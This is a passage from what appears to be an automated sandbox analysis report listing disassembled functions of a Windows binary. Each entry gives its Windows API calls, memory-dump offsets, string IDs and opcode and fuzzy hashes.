                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,003ADCD0,00000000,?,?,?,?), ref: 003A4E09
                                                    • GetWindowLongW.USER32 ref: 003A4E26
                                                    • SetWindowLongW.USER32 ref: 003A4E36
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Window$Long
                                                    • String ID: SysTreeView32
                                                    • API String ID: 847901565-1698111956
                                                    • Opcode ID: 80d40096cdb29e6dde2fe573da2742902ed5c3852b9464eff2f96df350a0b043
                                                    • Instruction ID: 362a012c4654d530a7a420cb355f71576a1224265cd478215e7ab22bb9e31f87
                                                    • Opcode Fuzzy Hash: 80d40096cdb29e6dde2fe573da2742902ed5c3852b9464eff2f96df350a0b043
                                                    • Instruction Fuzzy Hash: A031AD31100205AFDF268F38CC45BEA7BA9FB4A334F214715F975961E1D7B0A8508B50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003A4817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 003A489F
                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 003A48B3
                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 003A48D7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window
                                                    • String ID: SysMonthCal32
                                                    • API String ID: 2326795674-1439706946
                                                    • Opcode ID: 094d9876b88c0b4fdcefa392fa01fc755ed2c896b54d0de969e886483fd6fbdc
                                                    • Instruction ID: 5e8b1291ad71d5bc186d97d73d803d5c1232c1700ea4292caea43a5cfcac9f58
                                                    • Opcode Fuzzy Hash: 094d9876b88c0b4fdcefa392fa01fc755ed2c896b54d0de969e886483fd6fbdc
                                                    • Instruction Fuzzy Hash: F121A132600219AFDF268F90DC46FEA3B79EF89724F150214FA156B1D0D6B6A8518B90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003A4FB2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 003A5064
                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 003A5072
                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 003A5079
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$DestroyWindow
                                                    • String ID: msctls_updown32
                                                    • API String ID: 4014797782-2298589950
                                                    • Opcode ID: 92bc9a5e8e496000d955805135a8c1a0474f593c4b1c87c60b8ef6d0d4021e8c
                                                    • Instruction ID: 8db48e4d047dd602e218f19c62fa8b8a34564cefa63563193d5db9e4270aa098
                                                    • Opcode Fuzzy Hash: 92bc9a5e8e496000d955805135a8c1a0474f593c4b1c87c60b8ef6d0d4021e8c
                                                    • Instruction Fuzzy Hash: E1214AB5600609AFDB12DF64DCC1DBB37ACEF5B3A4B050559F9019B2A1CB71EC518BA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003A4116 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 003A419F
                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 003A41AF
                                                    • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 003A41D5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$MoveWindow
                                                    • String ID: Listbox
                                                    • API String ID: 3315199576-2633736733
                                                    • Opcode ID: 260d5b740b7d285a114a6295974eb082dd834b7bb239bb85efb67cbf70f99338
                                                    • Instruction ID: 4bdfdcd8513f3113daacfc3b44ab339f272c82f485d3fccc419fa99395dfe16a
                                                    • Opcode Fuzzy Hash: 260d5b740b7d285a114a6295974eb082dd834b7bb239bb85efb67cbf70f99338
                                                    • Instruction Fuzzy Hash: 2621A172610218BBEF238F54DC85EFB376EEFDA754F118124FA159B190C6B19C9287A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003A4B4A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 003A4BAE
                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 003A4BC3
                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 003A4BD0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: msctls_trackbar32
                                                    • API String ID: 3850602802-1010561917
                                                    • Opcode ID: b31a70d75315e6367fe24ce6fc40576ea4ef4536d7252881c254b2af12c53bab
                                                    • Instruction ID: f72e61f2506b8eb73d6bd5de8cadad1693da82ae97045acd93f367cbbdfd1b32
                                                    • Opcode Fuzzy Hash: b31a70d75315e6367fe24ce6fc40576ea4ef4536d7252881c254b2af12c53bab
                                                    • Instruction Fuzzy Hash: 5D11E331240208BEEF225F65CC46FEB7BACEFC6B14F120515FA95E60A0D6B1D8618B20
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003A61E1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 003A6220
                                                    • SetMenuItemInfoW.USER32 ref: 003A624D
                                                    • DrawMenuBar.USER32(?,?,00000030,?,00000030), ref: 003A625C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Menu$InfoItem$Draw
                                                    • String ID: 0
                                                    • API String ID: 3227129158-4108050209
                                                    • Opcode ID: b03e60b5bc9cec133a096126ba9c021a372ba4afe4af71bcb041cdc00c12ee25
                                                    • Instruction ID: 4e60fad5f56be22bd2b00fe3d671dbadb5cd1d5ecdbb5270e4b6126d41dd8f38
                                                    • Opcode Fuzzy Hash: b03e60b5bc9cec133a096126ba9c021a372ba4afe4af71bcb041cdc00c12ee25
                                                    • Instruction Fuzzy Hash: 53019275900218EFDB129F51DC85BAA7BB8FF46351F188099F84ADA150DB348994EF21
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037090F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 01b6c7e906cbd258b18b96c3455d6b8d3dfdc50fdcc3731998d04766bfe06e81
                                                    • Instruction ID: 1cc0f1b2ac9bc7b55da7c91df5fa0b630eb60313c0e6978f5867d770a7267ed1
                                                    • Opcode Fuzzy Hash: 01b6c7e906cbd258b18b96c3455d6b8d3dfdc50fdcc3731998d04766bfe06e81
                                                    • Instruction Fuzzy Hash: 49C16E75A00206EFDB2ACF94C894AAEB7B5FF48704F218598E509EF251D735EE41CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00344210 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: __alldvrm$_strrchr
                                                    • String ID:
                                                    • API String ID: 1036877536-0
                                                    • Opcode ID: 173a905e0583d248f4586312a6838000a577cfe73f6efb9ac5c35750ff0a0cfb
                                                    • Instruction ID: dbe9a106b3b4b53e4453d98bff2498c5d843d605dc3a299742a53e6cb3bc67a0
                                                    • Opcode Fuzzy Hash: 173a905e0583d248f4586312a6838000a577cfe73f6efb9ac5c35750ff0a0cfb
                                                    • Instruction Fuzzy Hash: E8A14676A007869FEB23CF29C891BAEBBE4EF55310F194179E9859F381C638AD41C750
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00370CC6 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,003B0BD4,?), ref: 00370E80
                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,003B0BD4,?), ref: 00370E98
                                                    • CLSIDFromProgID.OLE32(?,?,00000000,003ADCE0,000000FF,?,00000000,00000800,00000000,?,003B0BD4,?), ref: 00370EBD
                                                    • _memcmp.LIBVCRUNTIME ref: 00370EDE
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: FromProg$FreeTask_memcmp
                                                    • String ID:
                                                    • API String ID: 314563124-0
                                                    • Opcode ID: 7387c2e682046eb7d88b7f2c4a84381ee309eb021ef50e010ef9559683ecd51c
                                                    • Instruction ID: dce04690c8d4dfa84ae4f4d42c4209a9c49517c7b6962928ecd898a624e14639
                                                    • Opcode Fuzzy Hash: 7387c2e682046eb7d88b7f2c4a84381ee309eb021ef50e010ef9559683ecd51c
                                                    • Instruction Fuzzy Hash: 09812A71A00109EFCB15DF94C984EEEB7B9FF89315F208598F506AB250DB75AE06CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00392433 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 0039245A
                                                    • WSAGetLastError.WSOCK32 ref: 00392468
                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 003924E7
                                                    • WSAGetLastError.WSOCK32 ref: 003924F1
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$socket
                                                    • String ID:
                                                    • API String ID: 1881357543-0
                                                    • Opcode ID: 140d97248c01d4a9b3d8c0fac37e2b643a15d23da836cd01d785ce445f827f3b
                                                    • Instruction ID: e73fa453edf5dcadd471570ef8e45acc0a6bc3ca131b2c935f90df2b5e5f1613
                                                    • Opcode Fuzzy Hash: 140d97248c01d4a9b3d8c0fac37e2b643a15d23da836cd01d785ce445f827f3b
                                                    • Instruction Fuzzy Hash: 8241E338600210BFE726AF24C896F6A77E4AF09714F55C448F91A9F6D2C772ED818B90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003A6BD7 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetWindowRect.USER32 ref: 003A6C41
                                                    • ScreenToClient.USER32 ref: 003A6C74
                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 003A6CE1
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Window$ClientMoveRectScreen
                                                    • String ID:
                                                    • API String ID: 3880355969-0
                                                    • Opcode ID: dd7c3c8ed5b5a366d8b2ca7e75714a0926261c2fdc0dc0bdd4fbba27d5d4650d
                                                    • Instruction ID: 3a41164dbce11219009fbd6a840e7decaed6244af3caac9873feb4b731484fdd
                                                    • Opcode Fuzzy Hash: dd7c3c8ed5b5a366d8b2ca7e75714a0926261c2fdc0dc0bdd4fbba27d5d4650d
                                                    • Instruction Fuzzy Hash: 73516075A00209EFCF26CF64C9819AE7BB5FF56360F158259F8659B2A0D730ED81CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00386033 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 003860DD
                                                    • GetLastError.KERNEL32(?,00000000), ref: 00386103
                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00386128
                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00386154
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                    • String ID:
                                                    • API String ID: 3321077145-0
                                                    • Opcode ID: c3209f869950a7bb9067f2d50c108c11e0b530dc5ea46b01a97a3a60afc10f8f
                                                    • Instruction ID: 8d96683749be6002281430a9716c17be23a036150065dff200872d79d4bb9e23
                                                    • Opcode Fuzzy Hash: c3209f869950a7bb9067f2d50c108c11e0b530dc5ea46b01a97a3a60afc10f8f
                                                    • Instruction Fuzzy Hash: 25415A39200610DFCB16EF14C455A9EBBE2EF49320B198488E85AAF362CB35FC41CB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003A2039 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetForegroundWindow.USER32 ref: 003A204A
                                                      • Part of subcall function 003742CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 003742E6
                                                      • Part of subcall function 003742CC: GetCurrentThreadId.KERNEL32 ref: 003742ED
                                                      • Part of subcall function 003742CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00372E43), ref: 003742F4
                                                    • GetCaretPos.USER32(?), ref: 003A205E
                                                    • ClientToScreen.USER32(00000000,?), ref: 003A20AB
                                                    • GetForegroundWindow.USER32 ref: 003A20B1
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                    • String ID:
                                                    • API String ID: 2759813231-0
                                                    • Opcode ID: 2534911f8edd75ca2b8baf7473f1a625019c31daee4cc17c5edcbf68325555ec
                                                    • Instruction ID: db218d6e68c2e6514bc09cfffe450adc4b2899489468cc0473284442b79e3396
                                                    • Opcode Fuzzy Hash: 2534911f8edd75ca2b8baf7473f1a625019c31daee4cc17c5edcbf68325555ec
                                                    • Instruction Fuzzy Hash: E0311271E00109AFC715DFAAC8818EEB7FCEF49304B54846AE415EB611DB71EE45CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037E7C1 Relevance: 6.1, APIs: 4, Instructions: 87COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00314154: _wcslen.LIBCMT ref: 00314159
                                                    • _wcslen.LIBCMT ref: 0037E7F7
                                                    • _wcslen.LIBCMT ref: 0037E80E
                                                    • _wcslen.LIBCMT ref: 0037E839
                                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0037E844
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$ExtentPoint32Text
                                                    • String ID:
                                                    • API String ID: 3763101759-0
                                                    • Opcode ID: 86b9e167a9972660672cb957be784d5d897fe49998d09afb1be6fac9f65fcee8
                                                    • Instruction ID: 522341f34ead35ad334ea88d935206a4f9f17abc544b603ced961ba791293c4b
                                                    • Opcode Fuzzy Hash: 86b9e167a9972660672cb957be784d5d897fe49998d09afb1be6fac9f65fcee8
                                                    • Instruction Fuzzy Hash: D321A375D00214BFCB22DFA8C981BAEB7B8EF49750F1580A5E808AF245D6749E41C7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00378184 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0037960C: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00378199,?,000000FF,?,00378FE3,00000000,?,0000001C,?,?), ref: 0037961B
                                                      • Part of subcall function 0037960C: lstrcpyW.KERNEL32 ref: 00379641
                                                      • Part of subcall function 0037960C: lstrcmpiW.KERNEL32(00000000,?,00378199,?,000000FF,?,00378FE3,00000000,?,0000001C,?,?), ref: 00379672
                                                    • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00378FE3,00000000,?,0000001C,?,?,00000000), ref: 003781B2
                                                    • lstrcpyW.KERNEL32 ref: 003781D8
                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,00378FE3,00000000,?,0000001C,?,?,00000000), ref: 00378213
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: lstrcmpilstrcpylstrlen
                                                    • String ID: cdecl
                                                    • API String ID: 4031866154-3896280584
                                                    • Opcode ID: f8e9466d48b93622396687eda6d9a442cb026f5bab1095eb8254418b34ecdb69
                                                    • Instruction ID: bbabc0d5eb1fe9a437f059f6fba45565b5895659ea9c1e106320e0ab2eb9e0e3
                                                    • Opcode Fuzzy Hash: f8e9466d48b93622396687eda6d9a442cb026f5bab1095eb8254418b34ecdb69
                                                    • Instruction Fuzzy Hash: 52110B3A200305ABCB265F38D859E7A77A9FF99350B51802AF94ACB650EF359801C790
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003A8621 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 003A866A
                                                    • SetWindowLongW.USER32 ref: 003A8689
                                                    • SetWindowLongW.USER32 ref: 003A86A1
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0038C10A,00000000), ref: 003A86CA
                                                      • Part of subcall function 00312441: GetWindowLongW.USER32(00000000,000000EB), ref: 00312452
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
